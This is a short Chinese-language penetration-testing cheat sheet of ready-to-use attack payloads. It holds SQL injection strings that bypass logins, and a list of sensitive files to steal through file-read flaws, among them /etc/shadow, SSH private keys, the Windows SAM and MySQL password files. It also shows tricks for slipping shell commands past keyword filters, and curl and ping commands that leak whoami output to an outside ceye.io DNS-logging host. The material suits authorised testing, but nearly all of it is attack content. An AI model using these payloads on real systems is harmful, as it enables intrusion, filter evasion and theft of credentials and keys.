漏洞利用技巧速查
万能密码
' or 1='1
'or'='or'
'or 1=1/*
1' or '1'='1
admin
admin'--
admin' or 1=1--
admin' or 1=1/*
admin' or '1'='1'--
admin' or 'a'='a
任意文件下载/读取
常见敏感文件路径
Windows系统
C:\boot.ini # 查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml # IIS配置文件
C:\Windows\repair\sam # 系统初次安装密码
C:\Program Files\mysql\my.ini # MySQL系统配置
C:\Program Files\mysql\data\mysql\user.MYD # MySQL用户密码
C:\Windows\php.ini # php配置文件
C:\Windows\win.ini # Windows配置文件
Linux系统
/root/.ssh/authorized_keys # 公钥文件
/root/.ssh/id_rsa # 私钥文件
/root/.ssh/known_hosts # 每个访问计算机用户的公钥
/etc/passwd # 用户信息
/etc/shadow # 用户密码信息
/etc/my.conf # MySQL配置文件
/etc/httpd/conf/httpd.conf # Apache配置文件
/root/.bash_history # 历史命令
/root/.mysql_history # MySQL历史命令
/var/lib/mlocate/mlocate.db # 全文件路径
/usr/local/app/apache2/conf/httpd.conf # P、Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf # 虚拟网站设置
/usr/local/app/php7/lib/php.ini # php配置文件
/etc/php5/apache2/php.ini # Ubuntu默认php配置文件路径
黑名单关键字绕过
字符串拼接绕过
a=c;b=at;c=tex;d=t;$a$b ${c}${d}
环境变量绕过
echo ${SHELLOPTS}
echo ${SHELLOPTS:3:1}
${SHELLOPTS:3:1}at${IFS}text
空变量绕过
cat t${x}ext
通配符绕过
/bin/ca? tex?
DnsLog
Command Execution
Linux
curl http://ip.port.<your_identifier>.ceye.io/`whoami`
ping `whoami`.ip.port.<your_identifier>.ceye.io
Windows
ping %USERNAME%.<your_identifier>.ceye.io